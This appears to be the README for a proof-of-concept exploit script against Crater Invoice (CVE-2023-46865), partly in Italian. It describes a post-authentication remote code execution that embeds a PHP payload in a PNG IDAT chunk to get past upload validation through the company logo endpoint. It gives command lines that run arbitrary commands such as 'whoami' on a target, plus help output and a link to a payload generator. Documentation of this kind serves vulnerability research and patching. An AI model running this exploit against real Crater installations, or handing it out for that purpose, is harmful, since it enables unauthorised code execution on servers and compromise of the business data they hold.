
Crater <=6.0.6, CVE-2023-46865 RCE Post-autenticazione (Superadmin)
Crater <=6.0.6, CVE-2023-46865 Post-Auth RCE (Superadmin)
Crater Invoice è vulnerabile al caricamento di file senza restrizioni con tipo pericoloso a causa della mancanza di una corretta validazione dell'input. La classe di controllo Base64Mime può essere aggirata incorporando un payload PHP valido in un chunk IDAT dell'immagine. Un utente con privilegi di superadmin può caricare il payload creato attraverso il logo aziendale su /api/v1/company/upload-logo.
$~ usage: python3 crater-rce.py --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
$~ python3 crater-rce.py --target http://192.168.1.1 --email [email protected] --password test1234 --cmd 'whoami'
$~ python3 crater-rce.py -h
usage: crater-rce.py [-h] --target TARGET --email EMAIL --password PASSWORD [--cmd CMD]
Crater Invoice RCE - CVE-2023-46865
options:
-h, --help mostra questo messaggio di aiuto ed esce
--target TARGET URL target
--email EMAIL Email
--password PASSWORD Password
--cmd CMD Comando da eseguire
- Crater 6.0.6
- Kali 6.1.0
https://github.com/huntergregal/PNG-IDAT-Payload-Generator
https://notes.netbytesec.com/2023/11/post-auth-rce-in-crater.html
faisalfs10x - per aver aiutato a sviluppare il proof of concept.
Lo script è destinato esclusivamente ad analisi di sicurezza e ricerca, pertanto non sarò ritenuto responsabile per il suo utilizzo in attività illecite.